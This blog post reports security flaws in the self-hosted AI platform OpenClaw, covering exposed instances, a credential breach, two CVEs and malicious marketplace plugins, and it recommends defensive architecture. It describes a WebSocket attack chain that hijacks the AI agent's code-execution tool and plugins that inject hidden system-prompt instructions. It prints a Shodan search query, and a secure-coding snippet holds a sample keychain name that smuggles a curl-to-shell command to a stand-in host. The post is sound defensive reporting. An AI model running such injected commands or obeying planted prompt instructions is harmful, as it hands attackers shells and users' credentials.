DEV Community

Tiamat


OpenClaw Is a Security Catastrophe: 42,000 Exposed Instances, 1.5M Leaked Tokens, and Why AI Privacy Matters

You trusted it with your medical questions, your legal problems, your source code, your company's internal strategy. You ran it on your own hardware specifically so no one else could read those conversations. Then someone typed http.title:"OpenClaw" port:3000 into Shodan, and your instance was the fourth result.

This is the story of how the most popular self-hosted AI platform became the largest security incident in sovereign AI history — and what it reveals about the dangerous gap between privacy as a marketing claim and privacy as an architectural reality.


The Sovereign AI Promise

OpenClaw launched with a compelling pitch at exactly the right moment. As public trust in large AI providers eroded — driven by concerns about training data harvesting, conversation logging, and opaque data retention policies — a growing community of developers, enterprises, privacy researchers, and security-conscious users began looking for alternatives. OpenClaw gave them one.

Run your own AI. On your own hardware. Your data never leaves your control.

That promise resonated. Hard. Within eighteen months of launch, OpenClaw had cleared 2 million installs across developer machines, enterprise servers, hospital networks, and government workstations. The pitch was clean: instead of routing your most sensitive queries through OpenAI's servers or Anthropic's infrastructure, you run the orchestration layer yourself. You supply your own API keys. Your conversations live in a local SQLite database. Nobody else touches them.

For users with legitimate privacy needs — healthcare workers discussing patient cases with an AI assistant, lawyers reviewing privileged documents, security researchers handling sensitive vulnerability data, enterprises protecting proprietary source code — OpenClaw felt like the responsible choice.

The problem wasn't the premise. Self-hosted AI can be more private than managed services, under the right conditions. The problem was the implementation. OpenClaw shipped with an architecture that assumed users would handle their own security hardening, defaulted to no authentication for ease of setup, and built a plugin ecosystem with essentially no security review. Then it got popular fast, in exactly the population least likely to read the security documentation carefully.

The result is a catastrophe still unfolding in real time.


The Scale of the Exposure

Security researchers scanning the public internet with Shodan and BinaryEdge have identified more than 42,000 OpenClaw instances reachable from the open internet. Of those, 93% exhibit critical authentication bypass — meaning any unauthenticated user on the internet can walk directly into the full interface, read every stored conversation, extract every credential, and in many cases execute arbitrary commands on the underlying host.

Forty-two thousand instances. Ninety-three percent compromised by default.

To be precise about what that means: an unauthenticated attacker reaching one of these instances doesn't just see a login form they can try to brute-force. They see the complete application — conversation history going back months or years, all stored API keys for every connected service, OAuth tokens for Gmail, Slack, GitHub, and Notion, system prompts revealing how the user has configured their AI agent, uploaded documents the AI was asked to analyze, and in deployments with browser agent capabilities, a full history of URLs and page content the AI browsed on the user's behalf.

The contents of these exposed instances are extraordinarily sensitive. Because users trusted the platform with their most private queries. Health questions they wouldn't ask a doctor in person. Legal situations they haven't told their families about. Financial stress that would embarrass them professionally. Business strategies, acquisition plans, personnel decisions. Source code for unreleased products. Credentials for internal systems. The complete picture of a user's private intellectual life, laid out in readable text, accessible without a password.

The Moltbook Breach

The individual instance exposure would be damaging enough. Then came Moltbook.

Moltbook is a managed OpenClaw hosting provider — one of several companies that emerged to serve users who wanted the privacy pitch without the self-hosting complexity. Pay a monthly fee, get a managed OpenClaw instance. Your data stays on Moltbook's servers, not OpenAI's. For many users, this felt like a reasonable compromise.

In January 2026, a misconfiguration in Moltbook's backend infrastructure exposed a storage bucket containing 1.5 million API tokens and 35,000 user email addresses in a single incident. The tokens included live OpenAI API keys, Anthropic API keys, and OAuth tokens for connected services. Moltbook disclosed the breach 19 days after discovery — a timeline that security researchers criticized as dangerously slow given the sensitivity of active API credentials.

The Moltbook breach illustrates a recursive irony at the heart of the managed self-hosted market: users chose Moltbook specifically to avoid trusting a large AI provider with their data, then trusted a smaller, less-resourced company with worse security practices and a smaller incident response team. At least OpenAI has a dedicated security engineering organization. Moltbook had a misconfigured S3 bucket.

Security researcher Maor Dayan, who has been documenting OpenClaw's security posture since mid-2025, described the Moltbook incident as "the largest security incident in sovereign AI history" — a title that, given OpenClaw's trajectory, may not hold for long.


The CVEs: Technical Breakdown

The exposure problem is serious. The underlying CVEs make it catastrophic.

CVE-2026-25253 (CVSS 8.8): WebSocket Token Hijack Leading to Remote Code Execution

This is the one that ends careers.

OpenClaw's architecture includes a browser extension that communicates with the local desktop application via a persistent WebSocket connection. This connection is how the browser extension passes page content to the AI agent, receives responses, and triggers tool calls including — critically — OpenClaw's built-in code execution capability, which allows the AI to run terminal commands on the host machine.

The vulnerability: the WebSocket connection performs no origin validation. Any JavaScript running in any browser tab can send messages to the OpenClaw WebSocket on ws://localhost:40080. This isn't a theoretical attack surface. It's a one-liner.

The attack chain is straightforward and requires exactly one action from the victim: visiting a malicious webpage.

  1. User has OpenClaw desktop app running with browser extension active (the default, advertised workflow)
  2. User navigates to a malicious website — phishing link, malvertising, compromised legitimate site, anything
  3. Malicious JavaScript on the page sends crafted WebSocket messages to ws://localhost:40080
  4. Messages hijack the active OpenClaw session
  5. Attacker-controlled message triggers OpenClaw's code execution tool with arbitrary shell commands
  6. Full shell access on the victim's machine. No interaction beyond page load.
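The missing control is mechanical to implement. Here is a minimal Python sketch of the handshake check a local WebSocket endpoint like this should perform; the extension origin, the token-distribution mechanism, and all names are illustrative assumptions, not OpenClaw's actual code.

```python
import hmac
import secrets

# Illustrative only: a per-session token generated at app startup and
# handed to the browser extension out-of-band (e.g., native messaging).
# Page JavaScript never sees it, so a malicious tab cannot present it.
SESSION_TOKEN = secrets.token_urlsafe(32)

# Only the installed extension's origin may open the socket.
ALLOWED_ORIGINS = {"chrome-extension://openclaw-extension-id"}

def accept_handshake(origin: str, presented_token: str) -> bool:
    """Reject any WebSocket upgrade that is not from the extension
    or does not present the startup session token."""
    if origin not in ALLOWED_ORIGINS:
        return False  # blocks ws:// connections opened by arbitrary web pages
    # Constant-time comparison avoids leaking the token via timing.
    return hmac.compare_digest(presented_token, SESSION_TOKEN)
```

With a check like this in place, the malicious page in step 3 fails at the upgrade: its Origin header is the attacker's site, not the extension.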

Maor Dayan demonstrated this attack in a four-minute video that circulated through security communities in February 2026. In the video, Dayan visits a controlled malicious page, and within seconds has an interactive shell running on the target machine — reading /etc/passwd, creating files, establishing a reverse shell. The video is technically unremarkable in its simplicity, which is precisely what makes it damning. There's no exploitation of obscure memory corruption. No kernel vulnerability. Just: send WebSocket messages, execute commands.

The CVSS 8.8 score (High) reflects the attack's low complexity, no-privileges-required posture, and high impact across confidentiality, integrity, and availability.

OpenClaw partially addressed this in v0.9.7, adding basic WebSocket message validation. But WebSocket authentication remains disabled by default, and the validation can be bypassed in configurations where users have relaxed CORS settings — which the OpenClaw documentation explicitly recommends for certain enterprise deployment patterns. Partial patches for architectural security flaws are not fixes. They're noise.

In enterprise environments, the implications extend beyond the compromised workstation. If the machine running OpenClaw has network access to internal infrastructure — and enterprise machines do — the attacker's shell is a pivot point. Active Directory, internal APIs, source control, CI/CD pipelines, database servers. The attack surface is whatever the OpenClaw host can reach.

CVE-2026-27487: macOS Keychain Command Injection

OpenClaw on macOS includes keychain integration, enabled by default, that retrieves stored credentials from the system keychain for use in AI-powered workflows. The integration calls macOS security command-line utilities to access keychain items, constructing the command string by interpolating keychain entry names.

Those entry names are not sanitized.

A malicious keychain entry — created by another compromised application, by a malicious OpenClaw plugin (more on those shortly), or by any process with keychain write access — can inject shell metacharacters into the command string that OpenClaw constructs when it calls the keychain retrieval utility. The result is command injection at the privilege level of the OpenClaw process, which on most macOS installations runs as the user account — meaning full user-level code execution with access to all user files, persistent launch agents, and every credential stored in the keychain.
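The fix for this class of bug is equally mechanical: never hand attacker-influenced strings to a shell. A short Python illustration of the vulnerable pattern next to two safe alternatives; `security find-generic-password` is the real macOS utility, but the malicious entry name is a made-up example.

```python
import shlex

# A keychain entry name crafted by a malicious process (illustrative).
MALICIOUS_NAME = 'Slack"; curl http://evil.example/x.sh | sh; echo "'

# VULNERABLE: naive interpolation hands the shell attacker-controlled syntax.
unsafe_cmd = f'security find-generic-password -s "{MALICIOUS_NAME}" -w'

# SAFE option 1: build an argv list and run it with shell=False, so the
# entry name is a single inert argument no matter what it contains.
def build_keychain_argv(entry_name: str) -> list:
    return ["security", "find-generic-password", "-s", entry_name, "-w"]

# SAFE option 2: if a shell string is unavoidable, quote every interpolation.
safe_cmd = "security find-generic-password -s %s -w" % shlex.quote(MALICIOUS_NAME)
```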

This isn't a remote vulnerability. It requires either local access or the ability to write a malicious keychain entry through another vector. But on a machine that has already been touched by CVE-2026-25253 — the WebSocket RCE — the attacker has a shell. From that shell, writing a malicious keychain entry is trivial. CVE-2026-27487 then escalates whatever partial access an attacker had into credential exfiltration and persistent access.

The two CVEs chain. Dayan's demonstration video shows this exact sequence: WebSocket hijack for initial access, malicious keychain entry for persistence and credential exfiltration.

Affected: all macOS OpenClaw installations with keychain integration enabled. Keychain integration is enabled by default. There is no patch for CVE-2026-27487 at time of writing.


ClawHub: The Malicious Plugin Problem

OpenClaw's plugin ecosystem — ClawHub — hosts more than 50,000 published skills and plugins. These range from productivity tools and API integrations to custom AI agents, document processors, and workflow automations. The marketplace is central to OpenClaw's value proposition: users can extend their AI assistant with community-built capabilities.

In Q4 2025, Snyk conducted a security audit of 10,000 ClawHub skills. The results are staggering.

36.82% of scanned skills had at least one security flaw. Of those, 341 were explicitly malicious — not poorly written, not accidentally insecure, but deliberately designed to steal credentials, exfiltrate data, deliver malware, or create persistent access mechanisms on the host machine.

To contextualize that number: Google Play's malware rate, after years of investment in automated scanning, human review, and the Play Protect system, sits around 0.04%. Apple's App Store is approximately 0.02%. ClawHub's confirmed malicious rate (341 of 10,000 scanned skills, or 3.41%) is roughly 85 times worse than Google Play and roughly 170 times worse than the App Store.

The Snyk audit documented specific malicious behaviors found in ClawHub plugins:

Silent API key exfiltration. Several skills, presented as AI workflow tools, read OpenClaw's configuration database and silently transmitted stored API keys to attacker-controlled endpoints on installation or first use. The exfiltration was designed to look like normal API traffic, sent as HTTPS POST requests that superficially resembled legitimate telemetry.

System prompt injection and exfiltration. Skills that modify the system prompt — a legitimate capability for customizing AI behavior — were found to include hidden instructions that caused the AI to repeat sensitive conversation content in formats easily parsed by a secondary exfiltration mechanism.

Persistence after uninstall. Multiple "productivity" plugins installed launch agents, cron jobs, or launchd plists that survived the plugin uninstall process, maintaining callback channels to attacker infrastructure even after users believed they had removed the tool.

Fake security scanners. In what might be the most brazen finding in the audit, several skills presented themselves as OpenClaw security scanners — tools that would audit your configuration for vulnerabilities — and used the privileged access granted during the "security scan" to do precisely the opposite: extract credentials, inventory connected services, and report findings to attacker infrastructure.

OpenClaw's review process for ClawHub submissions is: community flagging, no automated scanning, no code review for most submissions. Anyone can publish a skill. Once published, a skill surfaces in marketplace search. The only quality gate is whether other users flag it as problematic — a reactive, crowd-sourced security posture applied to a marketplace hosting tools that run with full access to the AI agent's credential store and code execution capabilities.

This is not a plugin security problem. This is a supply chain security problem. Every ClawHub install executes unreviewed third-party code on the host machine, with access to every credential OpenClaw holds. Nearly thirty-seven percent of them are broken. Three hundred forty-one of them are weapons.


The Privacy Paradox

Here is the central, painful irony of the OpenClaw situation: the users most harmed by these vulnerabilities are the ones who were most thoughtful about privacy.

A user who just uses ChatGPT sends their conversations to OpenAI. OpenAI has a documented data handling policy, a security team, SOC 2 certification, GDPR compliance infrastructure, and regulatory accountability. You might not trust them. You probably shouldn't trust them blindly. But the attack surface for a third party stealing your ChatGPT conversations requires compromising OpenAI's infrastructure — a hard target.

An OpenClaw user concerned enough about privacy to self-host a complex AI stack has, without realizing it, created a different threat model. Their conversations live in a plaintext SQLite database on a machine they manage. That machine is accessible on port 3000. It has no authentication. It's running a WebSocket service with no origin validation. It's loaded with community plugins from a marketplace with a 36.82% flaw rate.

They've traded a hard target for an easy one, in exchange for a privacy promise the architecture cannot keep.

The Shodan query is not secret knowledge. http.title:"OpenClaw" port:3000 returns thousands of results to anyone with a free account. Security researchers use it. Penetration testers use it. Opportunistic attackers use it. The query is posted openly in security community forums with commentary that is decidedly not defensive in character.

What those exposed instances contain is the complete private intellectual life of people who specifically wanted privacy. Health questions they researched with AI assistance — symptoms, medications, diagnoses, mental health. Legal situations they couldn't afford to discuss with a lawyer, so they used AI instead. Financial stress — debt calculations, bankruptcy questions, desperate budget planning. Source code for products not yet announced. Business strategy documents. Personnel decisions about employees. The specific operational details that distinguish valuable corporate intelligence from noise.

The Moltbook breach made this concrete. The 35,000 exposed email addresses belong to identifiable humans who trusted Moltbook with their private AI conversations. The 1.5 million API tokens include live credentials for their connected services. The breach exposed not just their AI conversations but the keys to their email, their code repositories, their productivity tools — everything the AI was connected to.


Why This Keeps Happening: The Self-Hosted AI Security Problem

OpenClaw's failures aren't unique. They are structurally predictable.

Self-hosted AI is architecturally complex. A typical OpenClaw deployment involves: the core application server, a local or remote inference endpoint, a plugin runtime, a database layer, optional browser extension integration, optional agent capabilities with code execution, and network configuration to make it accessible where the user needs it. Each component is a potential vulnerability surface. Each integration between components is a trust boundary that can be misconfigured.

The average OpenClaw user is not a sysadmin. They're a developer, a researcher, an enthusiast. They're technically sophisticated enough to install and run a complex application. They are not necessarily equipped to reason carefully about network exposure, authentication configuration, plugin supply chain security, and WebSocket origin policies simultaneously. The documentation assumes they will. The defaults don't enforce it.

The "run it on your home network" use case — the one OpenClaw's setup guides walk users through — becomes the "accidentally exposed to the internet" use case through multiple common paths. Residential ISPs with carrier-grade NAT that users think blocks inbound connections but doesn't on all ports. VPN configurations that expose the local network. Port forwarding set up for remote access and then forgotten. Tailscale or Cloudflare Tunnel configurations that expose more than intended. Cloud VM deployments where the user forgot to configure firewall rules.

The setup documentation notes that "you may want to configure authentication before exposing OpenClaw to external networks." This is an understatement of clinical proportions. Authentication should be required by default, with a prominently documented process to disable it for explicitly local-only use. Instead, the defaults optimize for the fastest possible path to a working AI assistant, and security configuration is downstream of that experience.

Enterprise deployments present a different failure mode. IT departments approved self-hosted OpenClaw for compliance reasons — "our AI data stays in our infrastructure, not with a third-party provider." This is a legitimate compliance argument. But compliance and security are not synonyms. An enterprise OpenClaw instance with no authentication, loaded with unreviewed plugins, running with code execution enabled, on a machine with broad network access to internal infrastructure, is not a privacy improvement over a managed AI service. It is a high-privilege foothold waiting to be exploited.


The Credential Exposure Problem

OpenClaw stores connected service credentials in plaintext in its SQLite database. No encryption at rest. No key management. The credentials for every service a user has connected — OpenAI, Anthropic, Google, Slack, Gmail, GitHub, Notion, and any other integration — are readable by any process that can open the database file.

On an exposed instance with authentication bypass, this means the credential exfiltration step requires a single API call. Read the configuration endpoint. Parse the JSON. You have the keys.
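A short Python sketch of why plaintext-at-rest is so cheap to exploit; the table and column names here are assumptions for illustration, not OpenClaw's real schema.

```python
import sqlite3

# Stand-in for the application's credential store (illustrative schema).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE credentials (service TEXT, api_key TEXT)")
conn.executemany(
    "INSERT INTO credentials VALUES (?, ?)",
    [("openai", "sk-live-example"), ("github", "ghp_example")],
)

# With no encryption at rest, exfiltration is a single SELECT: any process
# (or any attacker with a shell) that can open the file reads every key.
stolen = dict(conn.execute("SELECT service, api_key FROM credentials"))
print(stolen)  # {'openai': 'sk-live-example', 'github': 'ghp_example'}
```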

The downstream consequences are layered.

With stolen API keys, an attacker can run inference on the victim's API account — burning through their credit balance with arbitrary requests, potentially submitting malicious prompts through the victim's authenticated account to explore provider security boundaries, or simply selling the keys on markets where active AI API credentials trade for significant sums.

With stolen OAuth tokens, the attacker has access to every connected service. Gmail tokens grant email access. GitHub tokens grant code repository access. Slack tokens grant workspace access. Notion tokens grant document access. The AI assistant was connected to these services to be useful. It had broad permissions. Those permissions are now the attacker's.

With RCE via CVE-2026-25253, the attacker has shell access and can exfiltrate the entire credential store, not just what's exposed through the application interface. They can install persistence mechanisms, establish reverse shells, and — in enterprise environments — use the compromised host as a pivot point for lateral movement through the internal network. OpenClaw agents in enterprise settings often hold credentials for internal developer tools, CI/CD systems, internal APIs, and database access tokens. The chain from "WebSocket message" to "inside the corporate network" can be traversed in minutes.


The AI Training Data Risk

The credential and conversation exposure from active exploitation is the acute risk. There's a chronic risk operating quietly beneath it.

Many OpenClaw plugins connect to third-party AI providers for specific capabilities — translation, image analysis, specialized domain models. Users configure these plugins believing they're running local AI. They often aren't. The plugins route to cloud APIs, and many of those APIs have training data policies that are, at best, ambiguous about what happens to user queries.

Users say things to their "private" AI assistant that they say specifically because they believe it's private. Medical symptoms that haven't been discussed with a doctor yet. Legal situations at a stage where privilege matters. Financial calculations involving specific account balances and debt structures. Relationship details. Business plans. The granular texture of someone's private life, provided to an AI precisely because the alternative was telling a human.

The 341 malicious ClawHub skills identified by Snyk may be specifically designed to harvest this content. Sensitive conversation data from users who self-selected for privacy concerns is an extraordinarily valuable training signal. Users willing to discuss their medical situations, legal problems, and financial stress with an AI assistant are providing exactly the emotionally and situationally rich dialogue that AI companies need to train systems that handle sensitive human situations well. And those users, by definition, have low tolerance for sharing that data with AI companies — making organic acquisition impossible, making covert exfiltration via a compromised plugin attractive.

The privacy paradox is complete: users self-hosted specifically to prevent AI training on their private conversations, and may have inadvertently delivered exactly that data to parties motivated to use it.


What Real Privacy-First AI Architecture Looks Like

The OpenClaw failures don't indict self-hosted AI. They indict a specific implementation of it. The architecture for genuinely privacy-respecting AI deployment exists and has known properties. OpenClaw just didn't build it.

Zero-trust architecture treats every component as potentially compromised and every communication as untrusted until verified. No component talks to another without authentication. The WebSocket connection between browser extension and desktop app authenticates with a session token generated at startup and verified on every message. Origin validation is enforced, not optional.

Encrypted credential storage is non-negotiable. API keys and OAuth tokens are encrypted at rest using keys derived from user-controlled secrets, ideally managed via HSM or OS-level secure enclaves. Plaintext credential storage in SQLite is not an oversight — it's an architectural choice, and it's the wrong one.

PII scrubbing before any external API contact means that conversation content never reaches a third-party endpoint without being processed by a scrubber that identifies and redacts sensitive entities — names, email addresses, phone numbers, account numbers, medical identifiers, and other sensitive patterns. The scrubber runs at the boundary between the local system and any external service. This makes plugin-based exfiltration dramatically harder: even if a plugin has unauthorized API access, the data it sees has been stripped of the highest-value sensitive content.
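As a sketch of the idea in Python: a boundary scrubber, even a crude regex-based one, strips the highest-value identifiers before anything leaves the machine. Real deployments would layer NER models and domain-specific rules on top; these three patterns are purely illustrative.

```python
import re

# Minimal illustrative scrubber -- covers only a few obvious identifier shapes.
PATTERNS = {
    "EMAIL": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.]+\b"),
    "PHONE": re.compile(r"\b\d{3}[-.\s]\d{3}[-.\s]\d{4}\b"),
    "SSN":   re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}

def scrub(text: str) -> str:
    """Redact sensitive entities before text crosses the external boundary."""
    for label, pattern in PATTERNS.items():
        text = pattern.sub(f"[{label}]", text)
    return text
```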

Plugin sandboxing limits what a skill can do regardless of what its code attempts. A plugin that processes text should not have filesystem access. A plugin that makes API calls should be limited to a pre-approved list of endpoints. No plugin should have access to the credential store. These constraints need to be enforced at the runtime level, not left to plugin authors to respect voluntarily. ClawHub's current model — unrestricted plugin execution with no automated security review — produces exactly the 341 malicious skills Snyk documented.
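The enforcement point matters: the allowlist lives in the runtime, not in the plugin. A minimal Python sketch of such a check; the plugin ID and endpoint are invented for illustration.

```python
from urllib.parse import urlparse

# Per-plugin manifest of pre-approved endpoints (illustrative names).
PLUGIN_ALLOWLIST = {
    "weather-skill": {("https", "api.weather.example")},
}

def is_request_allowed(plugin_id: str, url: str) -> bool:
    """Enforce the plugin's network allowlist at the runtime boundary,
    regardless of what the plugin's own code attempts."""
    parsed = urlparse(url)
    return (parsed.scheme, parsed.hostname) in PLUGIN_ALLOWLIST.get(plugin_id, set())
```

Note that the scheme is part of the tuple, so a downgrade to plain HTTP against an approved host is also refused.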

Network isolation separates the AI reasoning engine from the credential store. The component that calls external AI APIs should not be the same component that holds keys for connected services. Compromise of the inference pathway should not automatically yield credential access. These are different security domains and should be separated architecturally.

Audit logging makes every AI action reviewable. Every tool call. Every external API request. Every file read or write. Every credential access. The log should be tamper-evident and separately stored from the components it audits. If an AI agent does something it shouldn't — because of a compromised plugin, a jailbreak, or an attacker controlling the session — the audit log is the forensic record that makes incident response possible.
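One standard way to get tamper evidence is a hash chain: each entry's digest covers the previous entry's digest, so editing or deleting any historical record invalidates everything after it. A minimal Python sketch:

```python
import hashlib
import json

def append_entry(log: list, event: dict) -> None:
    """Append an event whose hash covers the previous entry's hash,
    so any retroactive edit breaks the chain."""
    prev = log[-1]["hash"] if log else "0" * 64
    payload = json.dumps(event, sort_keys=True)
    digest = hashlib.sha256((prev + payload).encode()).hexdigest()
    log.append({"event": event, "hash": digest})

def verify_chain(log: list) -> bool:
    """Recompute every digest from the genesis value; any mismatch
    means the log was altered after the fact."""
    prev = "0" * 64
    for entry in log:
        payload = json.dumps(entry["event"], sort_keys=True)
        if hashlib.sha256((prev + payload).encode()).hexdigest() != entry["hash"]:
            return False
        prev = entry["hash"]
    return True
```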

The privacy proxy pattern is the architectural approach that bundles these properties together coherently. Rather than exposing a complex AI stack directly to any network, all external-facing access routes through a dedicated proxy layer that handles authentication, PII scrubbing, credential management, rate limiting, and provider routing. The complex, sensitive internals never touch the network directly. The proxy is a narrow, well-audited surface area. Compromise of the proxy does not automatically yield access to the AI agent's credential store or conversation database.

This architecture is more complex to build than "run the app, open the port." It requires engineering investment. It requires security expertise in the design phase. It requires a commitment to treating privacy as an architectural property rather than a checkbox in the marketing copy.

OpenClaw made different choices. The result is 42,000 exposed instances and counting.


What Users Should Do Right Now

If you are running an OpenClaw instance, the following actions are not optional.

Check your exposure immediately. Run curl -s http://localhost:3000/api/config from the machine running OpenClaw. If you get a response without authentication, you are exposed to anyone who can reach that port. Then check whether port 3000 is reachable from outside your local network. If you're unsure, use an external port scanner against your public IP.
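To script the reachability half of that check, a small Python helper works; run it from a machine outside your network against your public IP, substituting whatever host and port your deployment uses.

```python
import socket

def port_is_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0

# Example: check the default OpenClaw port on the local machine.
# port_is_open("127.0.0.1", 3000)
```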

Rotate every API key stored in OpenClaw. Treat all of them as compromised. Go to OpenAI, Anthropic, Google Cloud, and every other provider you've connected, generate new API keys, and revoke the old ones. Do the same for OAuth tokens — revoke and reauthorize every connected service. If your credentials were in an exposed instance for any period of time, assume they've been read.

Audit your installed skills against the Snyk malicious skill list. Snyk has published indicators of compromise for the 341 confirmed malicious skills, including plugin IDs, hash values, and behavioral signatures. Cross-reference your installed plugins. If you have any of the flagged skills installed, uninstall them and then check for persistence mechanisms — cron jobs, launch agents, systemd services — that may have survived uninstall.
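Cross-referencing installed files against a published IoC list can be scripted in a few lines of Python. The flagged hash below is a placeholder (it is the SHA-256 of an empty file), not one of Snyk's real indicators; substitute the published values, and the plugin directory path for your install.

```python
import hashlib
from pathlib import Path

# Placeholder IoC set -- substitute the SHA-256 values Snyk actually published.
FLAGGED_SHA256 = {
    "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}

def audit_plugins(plugin_dir: str) -> list:
    """Return paths of installed plugin files whose SHA-256 digest
    appears in the flagged indicator list."""
    hits = []
    for path in Path(plugin_dir).rglob("*"):
        if path.is_file():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            if digest in FLAGGED_SHA256:
                hits.append(str(path))
    return hits
```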

Update to v0.9.7 immediately, understanding that this provides partial mitigation for CVE-2026-25253 only and does not address CVE-2026-27487, the plaintext credential storage issue, or the plugin supply chain problem. The update is necessary but not sufficient.

Enable authentication if you must expose OpenClaw to any network. The documentation covers this. Do it. Then reconsider whether the exposure is necessary at all — the safest OpenClaw configuration is localhost-only, with no external network access, no browser extension WebSocket endpoint, and code execution disabled unless explicitly needed.

For enterprise deployments: escalate this to your security team immediately. OpenClaw deployments in enterprise environments should be treated as potentially compromised and audited against the Snyk findings. Assess lateral movement risk from any host running OpenClaw with code execution enabled.


The Bigger Lesson

OpenClaw's security crisis is not an OpenClaw story. It's an AI industry story.

The privacy promises that drove OpenClaw's adoption were never false in intent. The developers who built it genuinely believe in user data sovereignty. The users who installed it made reasonable choices based on the information available. The managed hosting providers who built on top of it were trying to solve a real problem.

What went wrong is that privacy was treated as a feature rather than an architectural constraint. Privacy as a feature means you add authentication to the setup guide and call it privacy-preserving. Privacy as an architectural constraint means you assume breach, encrypt everything, separate security domains, require authentication by default, and treat every external integration as a potential vector.

The gap between those two approaches, at 2 million installs, with users who specifically entrusted the platform with their most sensitive data, is 42,000 exposed instances, 1.5 million leaked tokens, a CVSS 8.8 one-click RCE, and a plugin marketplace that is statistically more likely to contain malware than legitimate security software.

"Self-hosted equals private" is a dangerous oversimplification. Self-hosted can be more private. Or it can create far greater exposure than the managed alternative, because the attack surface is in your hands and you are not a security organization. The outcome depends entirely on the quality of the architecture and the security practices of the operator. OpenClaw optimized for adoption and ease of setup. The security consequences were predictable — and predicted, by researchers who raised these issues in the OpenClaw GitHub repository months before Maor Dayan's RCE demonstration went viral.

The path forward is not abandoning self-hosted AI. It is building it correctly: zero-trust internal architecture, encrypted credential storage, PII scrubbing at external boundaries, sandboxed plugin execution, mandatory authentication, narrow network exposure, and audit logging. It is treating security architecture as a prerequisite for the privacy promise rather than an afterthought to it.

The users who chose OpenClaw for privacy deserve an AI platform that delivers it architecturally. What they got was a plaintext SQLite database behind an unauthenticated port. The next sovereign AI platform needs to do better — not in the documentation, but in the defaults.


If you are evaluating self-hosted AI platforms, demand answers to the following before deployment: How are credentials stored? What authentication is enforced by default? How are plugins reviewed and sandboxed? What is the network exposure of each component? What audit logging exists? If the answers are "plaintext," "none," "community flagging," "everything on one port," and "none" — you have your answer.

The privacy-first AI infrastructure problem is solvable. OpenClaw just demonstrated, at scale, what happens when it isn't solved. That demonstration should drive the next generation of tools to build security into the architecture from day one — not as a promise in the readme, but as a constraint enforced by the system itself.


CVE details sourced from NVD advisories CVE-2026-25253 and CVE-2026-27487. Snyk audit findings published Q4 2025. Moltbook breach details from public disclosure. Maor Dayan's research and demonstration video circulated February 2026. Shodan scan methodology and instance counts from BinaryEdge public reporting.

Tags: security, ai, privacy, infosec, openclaw, vulnerability, self-hosted
